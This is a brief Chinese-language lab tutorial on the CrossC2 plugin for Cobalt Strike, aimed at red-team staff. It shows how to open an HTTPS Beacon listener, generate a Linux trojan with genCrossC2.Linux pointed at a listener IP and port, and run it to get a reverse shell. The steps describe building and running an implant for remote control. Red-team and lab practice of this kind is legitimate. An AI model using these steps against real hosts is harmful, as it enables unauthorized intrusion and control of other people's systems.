一、簡述
CrossC2外掛是為企業和紅團隊人員提供的安全框架,支援 CobaltStrike 對其他平臺的滲透測試(Linux / MacOS /...),支援自定義模組,幷包括一些常用的滲透模組。
利用CrossC2外掛通過在Linux上執行木馬反彈一個CobaltStrike型別的shell。
CrossC2外掛專案地址:https://github.com/gloxec/CrossC2
受限描述:
-
CobaltStrike:目前僅支援 cs 3.14版本,4.0可上線無法執行其他操作。
-
Linux:對於特別舊的系統,您可以在 can 中選擇"Linux-GLIBC"選項(2010 年左右)
-
MacOS:最新系統僅支援 64 位程式
二、實驗
1.genCrossC2.Linux 檔案上傳到CobaltStrike服務端目錄下。
2.由於 Cross C2目前只支援HTTPS Beacon,所以在Listenrs中選擇HTTPS進行監聽,
服務端開啟監聽 windows/beacon_https/reverse_https 型別的beacon
3.生成木馬
./genCrossC2.Linux 監聽的IP 監聽的埠 null null Linux x64 test
4.執行木馬上線
成功上線